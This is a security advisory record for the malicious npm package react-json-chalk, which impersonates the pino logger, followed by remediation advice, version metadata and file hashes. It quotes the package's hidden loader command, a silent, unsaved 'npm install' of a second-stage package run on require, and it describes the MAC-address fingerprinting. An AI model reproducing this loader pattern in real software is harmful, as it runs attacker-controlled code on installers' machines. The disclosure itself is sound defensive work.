-= Per source details. Do not edit below this line.=-
The package is published as react-json-chalk but its main entry (pino.js) impersonates the pino logger (homepage https://getpino.io, bundled pino source tree, misappropriated description). On require('react-json-chalk'), pino.js immediately loads lib/writer.js, which at module top level tries require('react-pinojs') and, if absent, executes child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent") and then require('../../react-pinojs/pino.js'). The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes react-pinojs, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same lib/writer.js defines getMacAddress() which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-004875",
"sha256": "c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2",
"modified_time": "2026-05-26T08:46:33Z",
"versions": [
"13.4.4"
],
"source": "amazon-inspector",
"import_time": "2026-05-26T09:17:32.746004914Z"
},
{
"versions": [
"13.4.6"
],
"sha256": "1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77",
"import_time": "2026-06-12T19:43:35.084546687Z",
"modified_time": "2026-06-12T19:02:15Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-005803"
},
{
"import_time": "2026-06-29T17:14:01.31609553Z",
"sha256": "252715cc7923480c7866ec9ba22f17e136bbc2fc86342ef3175998919d365e9b",
"modified_time": "2026-06-29T16:32:14Z",
"ranges": [
{
"type": "SEMVER",
"events": [
{
"introduced": "0"
}
]
}
],
"id": "GHSA-x796-gxxr-pvcr",
"source": "ghsa-malware"
},
{
"versions": [
"13.4.5"
],
"sha256": "f7769f5b4456161c24b491f71951a1007619f37462066c879d7a6f3418015703",
"import_time": "2026-07-08T19:33:42.109725653Z",
"modified_time": "2026-07-08T19:20:30Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-008182"
},
{
"modified_time": "2026-07-10T16:11:16Z",
"sha256": "90db3c701f30390b6a1787da4a1c84fb08a7175fbfbf2fe92904da4d109d4268",
"import_time": "2026-07-10T16:54:13.306222967Z",
"ranges": [
{
"type": "SEMVER",
"events": [
{
"introduced": "13.4.4"
},
{
"last_affected": "13.4.6"
}
]
}
],
"source": "ghsa-malware",
"id": "GHSA-x796-gxxr-pvcr"
}
]
}[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"package_integrity": [
{
"filename": "react-json-chalk-13.4.4.tgz",
"hashes": {
"sha1": "724a5212fe4047aca98aa934b3032af19109a35d",
"sha512_sri": "sha512-oos+FlJaUor3f0YgPAwsmL5gu2ba8WcmyDcObhNNH250f40/6SznsPt4RF5Uc2NRWKKrLpb3zWkWRyluWtXHzQ=="
}
}
],
"evidence_files": [
{
"tlsh": "05318bd78245a278f3b06aa10e5fa0d1b186e12521507dd83ffc84c367ab4e04ed4fd6",
"sha256": "1ab7958719307e09d349a855f54b59c7e5fe94d2f00b05440e2669b702514c7d",
"path": "lib/writer.js"
},
{
"tlsh": "dc018925ce785da308ec248548290252aa60ed6b584cfd5973d7a32c0f4e5bf68be1ad",
"sha256": "9b2a5f6bbbfa55f7db60f3e83edf0a71ddf98c5a2830aedcb35af2bd7a9b338e",
"path": "package.json"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json"